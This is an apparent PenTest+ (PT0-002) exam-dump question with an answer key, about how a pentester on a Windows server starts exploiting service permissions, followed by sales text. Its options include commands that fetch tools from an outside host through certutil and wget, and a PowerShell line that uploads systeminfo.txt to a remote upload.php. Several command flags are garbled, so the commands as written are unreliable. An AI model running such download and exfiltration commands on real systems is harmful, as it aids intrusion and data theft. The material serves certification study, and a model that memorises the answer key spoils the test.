A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.
Which of the following commands would help the tester START this process?
A . certutil Curlcache Csplit Cf http://192.168.2.124/windows-binaries/ accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)
C. schtasks /query /fo LIST /v | find /I “Next Run Time:”
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe CO accesschk64.exe
Answer: A
Explanation:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
— https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
Latest PT0-002 Dumps Valid Version with 110 Q&As
Latest And Valid Q&A | Instant Download | Once Fail, Full Refund